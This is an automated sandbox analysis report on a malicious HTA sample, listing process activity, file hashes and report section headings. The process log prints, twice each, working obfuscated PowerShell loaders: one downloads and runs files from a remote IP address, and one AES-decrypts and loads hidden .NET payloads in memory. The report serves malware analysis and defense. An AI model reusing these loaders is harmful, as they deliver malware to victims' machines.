Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

ID:	1429074
Product:	CloudBasic
Start time:	16:04:06
Start date:	20.04.2024
Sample:	hta.hta
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	dbc5a204c56d2c6c974bb9ce287978d4
SHA1:	dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256:	d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	233F5B68FD7D09F8D87F9EEC01D525E7	D70DF9E820EFED7923B02777B81D73D6BCCD8A05	865B036F9A4D37C2AA6D7F48C4870C0426B05CDA362B5527CF99C1AE86BAFF28
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x689d4e29, page size 16384, DirtyShutdown, Windows version 10.0	ABD599269C5CD0CFB8D98E181EFB504E	9EA8D4A7AE4234FE3579FA3D85FBC13AE57383C0	3AA16BBD0BCB2DAB2F9A478DA4B80DF8454EBC99780A6D78AEE966F8F61948C2
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	E8207ABFEC3CE8068C508051179E3006	5F8FD85935176260A344F4C0212A75B2EA306577	4063F3B60449BF91346976775B70BAD334B66DA8E479C750C5D3A9831223F6A1
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	data	E4D211EAEC94715169C453F3C7528D3E	9BCF8F3407F29C773D6ECC955B5975AA085C9FE1	6667DE9EF61DA9E23B285F75503622357C8770E87B96F94E50DC9B8FEACDF42E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	85509342E1C292F7D2E0AC39102FE3E8	F16147BCFB535421F31A57A0E8D39F844BAFA332	71C1831583DDA80B71BDD06338DF1DC0EF7A1C1172934CDC703EC68F4BE6D70E
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05blmdqe.4yh.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ql2421xb.nmu.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vp24bue4.0ff.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y12wcujt.vlr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2sjeiom.gwy.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\GoGi.bat	DOS batch file, ASCII text, with very long lines (51202), with CRLF line terminators	CAB2108A81D68104DD9B15EFCEDF8351	03852C18F75CAD87F71693FB1973D9A04E8910ED	A2DFE970DC385F9AA1A81946C4BC41144D182DBDDB02E37CE4C5B52C9B884AAA
C:\Users\user\AppData\Roaming\jiteon.xlsx	Microsoft Excel 2007+	DFA28CEEF932C1605D40981A5023DAB0	A6E8C5CDD144CB27685198FECAD8F9DEF48DFBE8	9E0BAC9938B4059F69ED52AF74337C38C242213ECD432746A483D44E1E74DFF6
C:\Users\user\AppData\Roaming\~$jiteon.xlsx	data	9C7132B2A8CABF27097749F4D8447635	71D7F78718A7AFC3EAB22ED395321F6CBE2F9899	7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
\Device\ConDrv	ASCII text, with very long lines (2145), with CRLF line terminators	823D9DC33A7F86A3319E5DC91E2CB63B	A407527A64E822DCD7FA0AE9EBA322429878A09C	202003A5881F3EA0451C758DD8C637246EB2A7D7BEDBD7DC6191015FBEEB38FA

Windows Analysis Report
hta.hta

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report hta.hta

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
hta.hta